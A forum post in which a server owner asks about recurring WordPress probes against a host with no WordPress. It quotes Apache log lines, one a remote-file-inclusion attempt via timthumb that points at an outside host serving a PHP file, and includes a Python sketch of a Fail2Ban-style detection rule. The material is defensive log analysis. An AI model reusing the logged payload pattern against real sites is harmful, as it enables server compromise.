Curious about WordPress probes

I've noticed a common attempt at looking for WordPress sites on my VPS basically since I set it up. This is not uncommon since I had similar issues before I moved over.

I don't have WordPress on my server and have never used it on any of the domains that I have hosted there, so any attempt is completely bogus.

While there are lots of IP-only based attempts, I don't use any virtual websites that work with just an IP; they have to be accessed by host name. I have noticed a curious trend, which is that most of the attempts are towards one of the virtual hosts and seldom to the others.

Are others seeing this as well?

I use Fail2Ban and created a rule to look for these attempts and block the IP of the site after they are caught, typically after 2 or more attempts, and that works quite well. But it is not uncommon for there to be upwards of 20-30 attempts from different sources a day, all for the exact same stuff on the same domain.

The domain is not all that special and again has never had WordPress on it, so it seems peculiar why this is a trend. The only other thing I can think of is that they are starting there first, getting trapped and never have the chance to try other domains sharing the same IP?

Example Entries:

static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/thumb.php?src=http%3a%2f%2fwordpress.com.supplymi.com/tmp.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info/pagecount/wp-content/themes/folioway/core/temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info//wp-content/uploads/thumb-temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"
static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:58 -0700] "GET //wp-content/themes/clockstone/images/cache/external_52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13"

SITE BLOCKED
2012-10-11 08:55:58,760 fail2ban.actions: WARNING [apache-hacks] Ban 209.217.252.178
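
The counting logic behind a rule like the one described in the question, written out as an added example (not the poster's rule and not Fail2Ban's own code): requests for WordPress-only paths that return 404 are counted per client, and a client is flagged once it reaches the threshold inside a time window. The path patterns, the 10-minute window and the name `find_bans` are assumptions; the first two sample lines are abbreviated from the entries above and the rest are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Paths that only exist on a WordPress install (assumed pattern list).
PROBE_RE = re.compile(r'/(wp-content|wp-admin|wp-includes)/|/wp-login\.php', re.I)

MAX_RETRY = 2                      # "2 or more attempts", as in the post
FIND_TIME = timedelta(minutes=10)  # assumed window; the post does not give one

def find_bans(lines, max_retry=MAX_RETRY, find_time=FIND_TIME):
    """Return clients (as logged) in the order they cross the threshold."""
    hits = defaultdict(deque)  # client -> timestamps of recent probes
    banned = []
    for line in lines:
        m = LINE_RE.match(line)
        # Only 404s count: the server hosts no WordPress, so a hit is a probe.
        if not m or m["status"] != "404" or not PROBE_RE.search(m["path"]):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        recent = hits[m["client"]]
        recent.append(ts)
        while ts - recent[0] > find_time:  # drop probes outside the window
            recent.popleft()
        if len(recent) >= max_retry and m["client"] not in banned:
            banned.append(m["client"])
    return banned

# First two lines abbreviated from the post (user agent shortened);
# the last three are constructed for contrast.
SAMPLE = [
    'static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:57 -0700] "GET /info//wp-content/uploads/thumb-temp/52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0"',
    'static-178-252-217-209.nocdirect.com - - [11/Oct/2012:08:55:58 -0700] "GET //wp-content/themes/clockstone/images/cache/external_52992e19d23ab002a7e4ab3cb478507d.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Oct/2012:09:00:00 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Oct/2012:09:01:00 -0700] "GET /wp-login.php HTTP/1.1" 404 1034 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Oct/2012:09:30:00 -0700] "GET /wp-admin/ HTTP/1.1" 404 1034 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_bans(SAMPLE))
```

The constructed client 203.0.113.9 is not flagged because its two probes fall 29 minutes apart, outside the assumed window.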

1 Reply

This kind of thing is normal; another common one is phpMyAdmin. Just ignore them, they do no harm.
